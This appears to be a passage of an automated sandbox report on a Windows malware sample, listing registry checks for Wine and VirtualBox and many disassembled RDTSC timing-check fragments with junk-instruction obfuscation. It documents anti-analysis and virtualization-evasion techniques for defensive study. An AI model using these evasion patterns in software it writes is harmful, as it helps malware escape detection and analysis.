Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FF16 second address: E5FF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FF1A second address: E5FF26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD5B3 second address: FCD5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD57F second address: FBD584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD584 second address: FBD589 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCC7C7 second address: FCC7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F70146AC606h 0x0000000f jmp 00007F70146AC613h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCC7E9 second address: FCC7EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCC7EF second address: FCC7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F70146AC606h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCC7FD second address: FCC807 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEF4E second address: FCEF5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEF5E second address: FCEF63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEF63 second address: FCEF69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEF69 second address: FCEF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEF6D second address: FCEF71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEF71 second address: FCEF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEF82 second address: FCEF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEF86 second address: FCEFF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F7014CC2CC1h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 ja 00007F7014CC2CC6h 0x0000001b pop eax 0x0000001c sub edi, dword ptr [ebp+122D35EDh] 0x00000022 push 00000003h 0x00000024 add dx, 8B6Bh 0x00000029 push 00000000h 0x0000002b mov ecx, 3E6B0A24h 0x00000030 push 00000003h 0x00000032 sub dword ptr [ebp+122D1AFAh], ebx 0x00000038 push D8566F87h 0x0000003d jnc 00007F7014CC2CC4h 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEFF7 second address: FCEFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEFFD second address: FCF02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 18566F87h 0x0000000c mov esi, dword ptr [ebp+122D3551h] 0x00000012 lea ebx, dword ptr [ebp+12442E3Fh] 0x00000018 mov si, ax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F7014CC2CC2h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF20C second address: FCF213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF213 second address: FCF2CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7014CC2CB8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007F7014CC2CC4h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F7014CC2CB8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 pushad 0x00000031 or dword ptr [ebp+122D2361h], eax 0x00000037 call 00007F7014CC2CC1h 0x0000003c and eax, 29E0773Eh 0x00000042 pop eax 0x00000043 popad 0x00000044 push 42C2EEF1h 0x00000049 jg 00007F7014CC2CC4h 0x0000004f xor dword ptr [esp], 42C2EE71h 0x00000056 mov si, C616h 0x0000005a push 00000003h 0x0000005c sub cl, 0000007Fh 0x0000005f push 00000000h 0x00000061 mov si, 7396h 0x00000065 jnl 00007F7014CC2CBCh 0x0000006b sbb edi, 5DAC348Ch 0x00000071 push 00000003h 0x00000073 sub dword ptr [ebp+122D2F6Dh], ecx 0x00000079 call 00007F7014CC2CB9h 0x0000007e push eax 0x0000007f push edx 0x00000080 push esi 0x00000081 pushad 0x00000082 popad 0x00000083 pop esi 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF2CA second address: FCF2CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF2CF second address: FCF30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 jbe 00007F7014CC2CC7h 0x0000000f jmp 00007F7014CC2CC1h 0x00000014 pop edi 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F7014CC2CC6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF30C second address: FCF312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF312 second address: FCF32F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7014CC2CC0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF32F second address: FCF34E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70146AC612h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF34E second address: FCF353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF353 second address: FCF359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF359 second address: FCF3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F7014CC2CB8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sub esi, 7F4B1D79h 0x00000028 lea ebx, dword ptr [ebp+12442E53h] 0x0000002e mov esi, dword ptr [ebp+122D2C1Ah] 0x00000034 xchg eax, ebx 0x00000035 jmp 00007F7014CC2CC8h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jng 00007F7014CC2CB6h 0x00000044 jmp 00007F7014CC2CBBh 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1CFC second address: FE1D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1D00 second address: FE1D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1D0A second address: FE1D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEE950 second address: FEE969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEEFC3 second address: FEEFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEEFC7 second address: FEEFCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEEFCF second address: FEEFEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC616h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC5C2C second address: FC5C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC5C30 second address: FC5C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEF968 second address: FEF96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFF15 second address: FEFF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F70146AC608h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFF22 second address: FEFF5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7014CC2CBEh 0x0000000e push eax 0x0000000f jmp 00007F7014CC2CC9h 0x00000014 jg 00007F7014CC2CB6h 0x0000001a pop eax 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFF5D second address: FEFF63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFF63 second address: FEFF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFF6B second address: FEFF71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF00CB second address: FF00D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF00D0 second address: FF00EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC618h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF00EE second address: FF010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F7014CC2CC5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF010E second address: FF0148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F70146AC606h 0x0000000a jns 00007F70146AC606h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F70146AC619h 0x00000018 jmp 00007F70146AC60Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF0148 second address: FF014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF014C second address: FF0155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF02D1 second address: FF02E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CBFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF02E4 second address: FF02E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF02E8 second address: FF02EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF39D5 second address: FF39F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F70146AC617h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF39F8 second address: FF39FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3B9A second address: FF3B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB02E second address: FFB044 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F7014CC2CC1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB559 second address: FFB573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F70146AC612h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD558 second address: FFD589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 ja 00007F7014CC2CB6h 0x00000016 popad 0x00000017 popad 0x00000018 push ecx 0x00000019 pushad 0x0000001a jmp 00007F7014CC2CBBh 0x0000001f pushad 0x00000020 popad 0x00000021 jno 00007F7014CC2CB6h 0x00000027 popad 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD589 second address: FFD58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFF57F second address: FFF5CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F7014CC2CC0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 155938A4h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F7014CC2CB8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e call 00007F7014CC2CB9h 0x00000033 jng 00007F7014CC2CC0h 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFF5CE second address: FFF60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F70146AC618h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F70146AC611h 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F70146AC606h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFF60E second address: FFF612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFF76E second address: FFF772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFF956 second address: FFF95B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1000226 second address: 100022A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1000445 second address: 1000453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7014CC2CBAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1000778 second address: 1000789 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F70146AC606h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1000789 second address: 100079F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7014CC2CBDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100083D second address: 1000841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1000DB0 second address: 1000DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100175F second address: 10017C1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F70146AC61Ah 0x00000008 jmp 00007F70146AC614h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F70146AC608h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov esi, dword ptr [ebp+122D1D2Dh] 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1F8Bh], eax 0x00000038 push 00000000h 0x0000003a mov esi, ecx 0x0000003c xchg eax, ebx 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F70146AC60Dh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1002730 second address: 1002734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1003284 second address: 1003289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1003289 second address: 1003296 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1003296 second address: 10032E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jbe 00007F70146AC610h 0x0000000b jmp 00007F70146AC60Ah 0x00000010 popad 0x00000011 nop 0x00000012 mov edi, 77B61C86h 0x00000017 push 00000000h 0x00000019 mov esi, dword ptr [ebp+122D1F52h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F70146AC608h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b mov dword ptr [ebp+122D1801h], eax 0x00000041 push eax 0x00000042 pushad 0x00000043 push ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10032E9 second address: 10032F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10032F2 second address: 10032F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10053D1 second address: 10053EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10053EB second address: 1005442 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F70146AC608h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 ja 00007F70146AC606h 0x0000002d push 00000000h 0x0000002f pushad 0x00000030 jmp 00007F70146AC60Fh 0x00000035 add dword ptr [ebp+122D27DBh], eax 0x0000003b popad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f js 00007F70146AC608h 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
